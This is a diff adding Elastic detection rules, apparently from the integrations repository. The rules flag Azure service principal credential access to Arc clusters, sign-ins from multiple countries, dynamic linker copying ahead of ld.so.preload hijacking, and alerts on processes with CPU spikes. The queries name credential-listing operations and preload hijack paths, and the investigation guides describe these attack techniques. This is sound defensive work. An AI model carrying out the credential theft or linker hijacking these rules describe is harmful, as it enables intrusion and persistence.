ASN.", + "false_positives": [ + "CI/CD pipelines that authenticate as a service principal and then access Arc clusters as part of deployment workflows will trigger this rule. Identify and exclude known automation service principal app IDs.", + "Administrators using service principal credentials to manage Arc-connected clusters during maintenance windows may trigger this rule. Correlate with change management records." + ], + "from": "now-30m", + "index": [ + "logs-azure.signinlogs-*", + "logs-azure.activitylogs-*" + ], + "interval": "15m", + "investigation_fields": { + "field_names": [ + "@timestamp", + "azure.signinlogs.properties.app_id", + "azure.signinlogs.properties.app_display_name", + "azure.signinlogs.properties.service_principal_name", + "azure.signinlogs.category", + "azure.activitylogs.operation_name", + "azure.activitylogs.identity.claims.appid", + "azure.resource.id", + "source.ip", + "source.geo.country_name", + "source.geo.city_name", + "source.as.organization.name" + ] + }, + "language": "eql", + "license": "Elastic License v2", + "name": "Azure Service Principal Sign-In Followed by Arc Cluster Credential Access", + "note": "## Triage and analysis\n\n### Investigating Azure Service Principal Sign-In Followed by Arc Cluster Credential Access\n\nThis rule detects the complete attack entry point for Arc-proxied Kubernetes attacks: a service principal authenticates\nto Azure AD, then immediately retrieves Arc cluster credentials. This is the prerequisite sequence before any\nKubernetes-level activity can occur through the Arc proxy.\n\n### Possible investigation steps\n\n- Identify the service principal using the `app_id` from the sign-in event and resolve it in Azure AD \u2014 is this a\n known application?\n- Check the sign-in source IP and geolocation \u2014 does it match expected infrastructure locations for this SP?\n- Review when the SP credentials were last rotated \u2014 stale credentials are more likely compromised.\n- Check the ASN of the sign-in source \u2014 is it from a known cloud provider, corporate network, or unexpected consumer ISP?\n- Examine Azure Activity Logs after the credential listing for any Arc-proxied operations (secret/configmap CRUD).\n- Correlate with Kubernetes audit logs for operations by the Arc proxy service account\n (`system:serviceaccount:azure-arc:azure-arc-kube-aad-proxy-sa`) in the same time window.\n- Review Azure AD Audit Logs for recent changes to this SP (new credentials, federated identities, owner changes).\n\n### Response and remediation\n\n- Immediately rotate the service principal credentials (secrets and certificates).\n- Revoke active sessions and tokens for the SP.\n- Review and remove any unauthorized Azure role assignments on Arc-connected clusters.\n- Check Kubernetes audit logs for any operations performed through the Arc proxy after credential access.\n- Rotate any Kubernetes secrets that may have been accessed through the proxy tunnel.\n- Enable conditional access policies to restrict service principal authentication by location if supported.\n", + "query": "sequence with maxspan=30m\n[authentication where event.dataset == \"azure.signinlogs\"\n and azure.signinlogs.category == \"ServicePrincipalSignInLogs\"\n and azure.signinlogs.properties.status.error_code == 0\n] by azure.signinlogs.properties.app_id\n[any where event.dataset == \"azure.activitylogs\"\n and azure.activitylogs.operation_name : \"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/LISTCLUSTERUSERCREDENTIAL/ACTION\"\n and event.outcome : (\"Success\", \"success\")\n] by azure.activitylogs.identity.claims.appid\n", + "references": [ + "https://learn.microsoft.com/en-us/azure/azure-arc/kubernetes/cluster-connect", + "https://learn.microsoft.com/en-us/cli/azure/connectedk8s#az-connectedk8s-proxy", + "https://learn.microsoft.com/en-us/entra/identity/monitoring-health/concept-sign-ins", + "https://www.ibm.com/think/x-force/identifying-abusing-azure-arc-for-hybrid-escalation-persistence", + "https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/" + ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "^1.0.0" + }, + { + "package": "azure", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.identity.claims.appid", + "type": "unknown" + }, + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.signinlogs.category", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.app_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.status.error_code", + "type": "integer" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "dacfbecd-7927-46a7-a8ba-feb65a2e990d", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Domain: Identity", + "Data Source: Azure", + "Data Source: Azure Arc", + "Data Source: Microsoft Entra ID", + "Data Source: Microsoft Entra ID Sign-In Logs", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Initial Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1552", + "name": "Unsecured Credentials", + "reference": "https://attack.mitre.org/techniques/T1552/", + "subtechnique": [ + { + "id": "T1552.007", + "name": "Container API", + "reference": "https://attack.mitre.org/techniques/T1552/007/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.004", + "name": "Cloud Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "dacfbecd-7927-46a7-a8ba-feb65a2e990d_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/db97a2aa-3ba5-4fa5-b8b9-bf42284edb5f_1.json b/packages/security_detection_engine/kibana/security_rule/db97a2aa-3ba5-4fa5-b8b9-bf42284edb5f_1.json new file mode 100644 index 00000000000..c40783e8911 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/db97a2aa-3ba5-4fa5-b8b9-bf42284edb5f_1.json @@ -0,0 +1,182 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when an Azure service principal authenticates from multiple countries within a short time window, which may indicate stolen credentials being used from different geographic locations. Service principals typically authenticate from consistent locations tied to their deployment infrastructure. Authentication from multiple countries in a brief period suggests credential compromise, particularly when the source countries do not align with the organization's expected operating regions. This pattern has been observed in attacks using stolen CI/CD credentials, phished service principal secrets, and compromised automation accounts.", + "false_positives": [ + "Service principals used by globally distributed CI/CD systems (e.g., GitHub Actions runners in multiple regions) may legitimately authenticate from different countries. Baseline the expected geographic distribution for each service principal.", + "VPN or proxy usage by administrators managing service principals from different locations may produce multi-country sign-in patterns. Correlate with the administrator's known travel or access patterns." + ], + "from": "now-8h", + "interval": "1h", + "investigation_fields": { + "field_names": [ + "azure.signinlogs.properties.service_principal_id", + "azure.signinlogs.properties.app_display_name", + "Esql.source_geo_country_iso_code_count_distinct", + "Esql.source_geo_country_name_values", + "Esql.source_geo_city_name_values", + "Esql.source_ip_values", + "Esql.source_ip_country_pair_values", + "Esql.source_network_org_name_values", + "Esql.resource_display_name_values", + "Esql.app_id_values", + "Esql.app_owner_tenant_id_values", + "Esql.source_ip_count_distinct", + "Esql.source_geo_city_name_count_distinct", + "Esql.source_network_org_name_count_distinct", + "Esql.timestamp_first_seen", + "Esql.timestamp_last_seen", + "Esql.event_count" + ] + }, + "language": "esql", + "license": "Elastic License v2", + "name": "Azure Service Principal Authentication from Multiple Countries", + "note": "## Triage and analysis\n\n### Investigating Azure Service Principal Authentication from Multiple Countries\n\nService principals are non-interactive identities used for automation and application access. Unlike user accounts,\nthey rarely change geographic location. Authentication from multiple countries in a short window is a strong indicator\nof credential compromise.\n\n### Possible investigation steps\n\n- Identify the service principal using the `app_id` and `app_display_name` from the alert.\n- Review the list of countries and source IPs \u2014 do they match known infrastructure locations?\n- Check when the service principal credentials were last rotated \u2014 stale credentials are more likely compromised.\n- Investigate what resources were accessed after authentication using Azure Activity Logs and Graph Activity Logs.\n- Correlate with Azure AD Audit Logs for recent changes to the service principal (new credentials, federated\n identities, owner changes).\n- Check if the service principal has Azure Arc or Kubernetes-related role assignments, which could indicate\n targeting of cluster resources.\n\n### False positive analysis\n- If the service principal is used by a CI/CD pipeline, check if the different countries align with known runner locations. Baseline the expected geographic distribution for that SP.\n- If administrators manage the SP, correlate with known travel patterns or VPN usage that could explain multi-country access.\n\n### Response and remediation\n\n- Immediately rotate the service principal credentials (secrets and certificates).\n- Revoke active sessions and tokens.\n- Review and remove any unauthorized role assignments.\n- Audit resources accessed from the suspicious locations.\n- Enable conditional access policies to restrict service principal authentication by location if supported.\n", + "query": "FROM logs-azure.signinlogs-* metadata _id, _index\n| WHERE event.dataset == \"azure.signinlogs\"\n AND azure.signinlogs.category == \"ServicePrincipalSignInLogs\"\n AND azure.signinlogs.properties.status.error_code == 0\n AND source.geo.country_iso_code IS NOT NULL\n AND azure.signinlogs.properties.service_principal_id IS NOT NULL\n AND NOT azure.signinlogs.properties.app_owner_tenant_id IN (\n \"f8cdef31-a31e-4b4a-93e4-5f571e91255a\",\n \"72f988bf-86f1-41af-91ab-2d7cd011db47\"\n )\n\n| EVAL\n Esql.source_ip_string = TO_STRING(source.ip),\n Esql.source_ip_country_pair = CONCAT(Esql.source_ip_string, \" - \", source.geo.country_name)\n\n| STATS\n Esql.source_geo_country_iso_code_count_distinct = COUNT_DISTINCT(source.geo.country_iso_code),\n Esql.source_geo_country_name_values = VALUES(source.geo.country_name),\n Esql.source_geo_city_name_values = VALUES(source.geo.city_name),\n Esql.source_ip_values = VALUES(source.ip),\n Esql.source_ip_country_pair_values = VALUES(Esql.source_ip_country_pair),\n Esql.source_network_org_name_values = VALUES(`source.as.organization.name`),\n Esql.resource_display_name_values = VALUES(azure.signinlogs.properties.resource_display_name),\n Esql.app_id_values = VALUES(azure.signinlogs.properties.app_id),\n Esql.app_owner_tenant_id_values = VALUES(azure.signinlogs.properties.app_owner_tenant_id),\n Esql.source_ip_count_distinct = COUNT_DISTINCT(source.ip),\n Esql.source_geo_city_name_count_distinct = COUNT_DISTINCT(source.geo.city_name),\n Esql.source_network_org_name_count_distinct = COUNT_DISTINCT(`source.as.organization.name`),\n Esql.timestamp_first_seen = MIN(@timestamp),\n Esql.timestamp_last_seen = MAX(@timestamp),\n Esql.event_count = COUNT(*)\n BY azure.signinlogs.properties.service_principal_id, azure.signinlogs.properties.app_display_name\n\n| WHERE Esql.source_geo_country_iso_code_count_distinct >= 2\n| KEEP *\n", + "references": [ + "https://learn.microsoft.com/en-us/entra/identity/monitoring-health/concept-sign-ins", + "https://learn.microsoft.com/en-us/entra/identity/conditional-access/workload-identities", + "https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/", + "https://www.wiz.io/blog/lateral-movement-risks-in-the-cloud-and-how-to-prevent-them-part-3-from-compromis" + ], + "related_integrations": [ + { + "package": "azure", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.app_id_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.app_owner_tenant_id_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.event_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.resource_display_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.source_geo_city_name_count_distinct", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.source_geo_city_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.source_geo_country_iso_code_count_distinct", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.source_geo_country_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.source_ip_count_distinct", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.source_ip_country_pair_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.source_ip_values", + "type": "ip" + }, + { + "ecs": false, + "name": "Esql.source_network_org_name_count_distinct", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.source_network_org_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.timestamp_first_seen", + "type": "date" + }, + { + "ecs": false, + "name": "Esql.timestamp_last_seen", + "type": "date" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.app_display_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.service_principal_id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "db97a2aa-3ba5-4fa5-b8b9-bf42284edb5f", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Domain: Identity", + "Data Source: Azure", + "Data Source: Microsoft Entra ID", + "Data Source: Microsoft Entra ID Sign-In Logs", + "Use Case: Identity and Access Audit", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.004", + "name": "Cloud Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 1 + }, + "id": "db97a2aa-3ba5-4fa5-b8b9-bf42284edb5f_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_215.json b/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_215.json new file mode 100644 index 00000000000..c0541e415a7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_215.json @@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the copying of the Linux dynamic loader binary and subsequent file creation for the purpose of creating a backup copy. This technique was seen recently being utilized by Linux malware prior to patching the dynamic loader in order to inject and preload a malicious shared object file. This activity should never occur and if it does then it should be considered highly suspicious or malicious.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.file*", + "logs-endpoint.events.process*", + "logs-sentinel_one_cloud_funnel.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Dynamic Linker Copy", + "note": "## Triage and analysis\n\n### Investigating Dynamic Linker Copy\n\nThe Linux dynamic linker is responsible for loading shared libraries required by executables at runtime. It is a critical component of the Linux operating system and should not be tampered with. \n\nAdversaries may attempt to copy the dynamic linker binary and create a backup copy before patching it to inject and preload malicious shared object files. This technique has been observed in recent Linux malware attacks and is considered highly suspicious or malicious.\n\nThe detection rule 'Dynamic Linker Copy' is designed to identify such abuse by monitoring for processes with names \"cp\" or \"rsync\" that involve copying the dynamic linker binary (\"/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2\") and modifying the \"/etc/ld.so.preload\" file. Additionally, the rule checks for the creation of new files with the \"so\" extension on Linux systems. By detecting these activities within a short time span (1 minute), the rule aims to alert security analysts to potential malicious behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n### Possible investigation steps\n\n- Investigate the dynamic linker that was copied or altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE ( path = '/etc/ld.so.preload' OR path = '/lib64/ld-linux-x86-64.so.2' OR path =\\n'/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2' OR path = '/usr/lib64/ld-linux-x86-64.so.2' OR path =\\n'/usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2' )\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT f.path, u.username AS file_owner, g.groupname AS group_owner, datetime(f.atime, 'unixepoch') AS\\nfile_last_access_time, datetime(f.mtime, 'unixepoch') AS file_last_modified_time, datetime(f.ctime, 'unixepoch') AS\\nfile_last_status_change_time, datetime(f.btime, 'unixepoch') AS file_created_time, f.size AS size_bytes FROM file f LEFT\\nJOIN users u ON f.uid = u.uid LEFT JOIN groups g ON f.gid = g.gid WHERE ( path = '/etc/ld.so.preload' OR path =\\n'/lib64/ld-linux-x86-64.so.2' OR path = '/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2' OR path =\\n'/usr/lib64/ld-linux-x86-64.so.2' OR path = '/usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2' )\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n- The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Modification of Dynamic Linker Preload Shared Object Inside A Container - 342f834b-21a6-41bf-878c-87d116eba3ee\n- Modification of Dynamic Linker Preload Shared Object - 717f82c2-7741-4f9b-85b8-d06aeb853f4f\n- Shared Object Created or Changed by Previously Unknown Process - aebaa51f-2a91-4f6a-850b-b601db2293f4\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by process.entity_id with maxspan=1m\n [process where host.os.type == \"linux\" and event.type == \"start\" and process.name in (\"cp\", \"rsync\", \"mv\") and\n process.args in (\n \"/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2\", \"/etc/ld.so.preload\", \"/lib64/ld-linux-x86-64.so.2\",\n \"/usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2\", \"/usr/lib64/ld-linux-x86-64.so.2\"\n ) and\n not process.args like (\"/var/tmp/mkinitramfs*\", \"/var/tmp/dracut*\", \"/tmp/mkinitcpio*\")]\n[file where host.os.type == \"linux\" and event.action == \"creation\" and (file.extension == \"so\" or file.name like \"*.so.*\")]\n", + "references": [ + "https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "df6f62d9-caab-4b88-affa-044f4395a1e0", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Threat: Orbit", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.006", + "name": "Dynamic Linker Hijacking", + "reference": "https://attack.mitre.org/techniques/T1574/006/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 215 + }, + "id": "df6f62d9-caab-4b88-affa-044f4395a1e0_215", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/df9c0e92-5dee-4f1d-a760-3a5c039e4382_4.json b/packages/security_detection_engine/kibana/security_rule/df9c0e92-5dee-4f1d-a760-3a5c039e4382_4.json new file mode 100644 index 00000000000..d82b080f4ec --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/df9c0e92-5dee-4f1d-a760-3a5c039e4382_4.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule correlates security alerts with processes exhibiting unusually high CPU utilization on the same host and process ID within a short time window. This behavior may indicate malicious activity such as malware execution, cryptomining, exploit payload execution, or abuse of system resources following initial compromise.", + "from": "now-9m", + "interval": "5m", + "language": "esql", + "license": "Elastic License v2", + "name": "Detection Alert on a Process Exhibiting CPU Spike", + "note": "## Triage and analysis\n\n### Investigating Detection Alert on a Process Exhibiting CPU Spike\n\nThis rule identifies processes that both triggered a security alert and exhibited unusually high CPU utilization on the\nsame host and process ID within a short time window. This combination may indicate malicious execution, resource abuse, or\npost-compromise activity.\n\n### Possible investigation steps\n- Review the correlated alert(s) to understand why the process was flagged by Elastic Defend.\n- Examine the process name, command line, and SHA-256 hash to determine whether the process is expected or known to be malicious.\n- Validate the observed CPU usage and duration to determine whether the spike is abnormal for this process and host.\n- Check for related process activity such as parent/child processes, suspicious process spawning, or privilege escalation attempts.\n- Review additional host telemetry including:\n - Network connections initiated by the process\n - File creation or modification events\n - Persistence mechanisms (services, scheduled tasks, registry keys)\n- Determine whether similar activity is observed on other hosts, which may indicate a broader compromise.\n\n### False positive analysis\n- Legitimate high-CPU processes such as software updates, backup agents, security scans, or system maintenance tasks.\n- Resource-intensive but benign applications (e.g., compilers, video encoding, data processing jobs).\n- Security tools or monitoring agents temporarily consuming high CPU.\n\n### Response and remediation\n- If malicious activity is confirmed, isolate the affected host to prevent further impact.\n- Terminate the offending process if safe to do so.\n- Remove any identified malicious binaries or artifacts and eliminate persistence mechanisms.\n- Apply relevant patches or configuration changes to remediate the root cause.\n- Monitor the environment for recurrence of similar high-CPU processes combined with security alerts.\n- Escalate the incident if multiple hosts or indicators suggest coordinated or widespread activity.", + "query": "FROM metrics-*, .alerts-security.* METADATA _index\n| where not KQL(\"\"\"kibana.alert.rule.tags : \"Rule Type: Higher-Order Rule\" \"\"\")\n| eval\n // processes with more than 70% total CPU use\n cpu_metrics_pids = CASE(_index like \".ds-metrics-system.process-*\" and system.process.cpu.total.norm.pct >= 0.7, process.pid, null),\n // any security alert with process.name and ID populated excluding low severity ones\n alerts_pids = CASE(_index like \".internal.alerts-security.*\" and kibana.alert.rule.name is not null and process.name is not null and process.pid is not null and host.id is not null and kibana.alert.risk_score > 21, process.pid, null)\n| stats pid_with_cpu_spike = COUNT_DISTINCT(cpu_metrics_pids), pid_with_alerts = COUNT_DISTINCT(alerts_pids),\n Esql.max_cpu_pct = MAX(system.process.cpu.total.norm.pct),\n Esql.alerts = VALUES(kibana.alert.rule.name),\n Esql.process_hash_sha256 = VALUES(process.hash.sha256),\n process_path = VALUES(process.executable),\n parent_process_path = VALUES(process.parent.executable),\n user_name = VALUES(user.name),\n host_name = VALUES(host.name),\n cmdline = VALUES(process.command_line) by process.pid, process.name, host.id\n| where pid_with_cpu_spike > 0 and pid_with_alerts > 0\n// populate fields to use in rule exceptions\n| eval process.hash.sha256 = MV_FIRST(Esql.process_hash_sha256),\n process.executable = MV_FIRST(process_path),\n process.parent.executable = MV_FIRST(parent_process_path),\n process.command_line = MV_FIRST(cmdline),\n user.name = MV_FIRST(user_name),\n host.name = MV_FIRST(host_name)\n| KEEP user.name, host.id, host.name, process.*, Esql.*\n| where `process.executable` != \"C:\\\\Program Files\\\\ESET\\\\ESET Security\\\\ekrn.exe\" and\n `process.executable` != \"C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe\" and\n `process.executable` != \"C:\\\\Program Files\\\\UiPath\\\\Studio\\\\UiPath.ActivityCompiler.CommandLine.exe\"\n", + "required_fields": [ + { + "ecs": false, + "name": "Esql.alerts", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.max_cpu_pct", + "type": "double" + }, + { + "ecs": false, + "name": "Esql.process_hash_sha256", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.hash.sha256", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "df9c0e92-5dee-4f1d-a760-3a5c039e4382", + "setup": "## Setup\n\nThis rule requires host CPU metrics collected via the Elastic Agent **System** integration.\n\n### System Metrics Integration Setup\nThe System integration collects host-level metrics such as CPU usage, load, memory, and process statistics and sends them to Elasticsearch using Elastic Agent.\n\n#### Prerequisite Requirements:\n- Elastic Agent managed by Fleet\n- A Fleet Server configured and reachable\n Refer to the Fleet Server setup guide:\n https://www.elastic.co/guide/en/fleet/current/fleet-server.html\n\n#### The following steps should be executed in order to enable CPU metrics collection:\n- Go to the Kibana home page and click **Add integrations**.\n- In the search bar, enter **System** and select the **System** integration.\n- Click **Add System**.\n- Configure an integration name and optionally add a description.\n- Under **Metrics**, ensure the following datasets are enabled:\n - `system.cpu`\n - `system.load` (optional but recommended)\n - `system.process` (optional, if process-level CPU is required)\n- Review optional and advanced settings as needed.\n- Add the integration to an existing agent policy or create a new agent policy.\n- Deploy the Elastic Agent to the hosts from which CPU metrics should be collected.\n- Click **Save and Continue** to finalize the setup.\n\n#### Validation\nAfter deployment, verify CPU metrics ingestion by confirming the presence of documents in:\n- 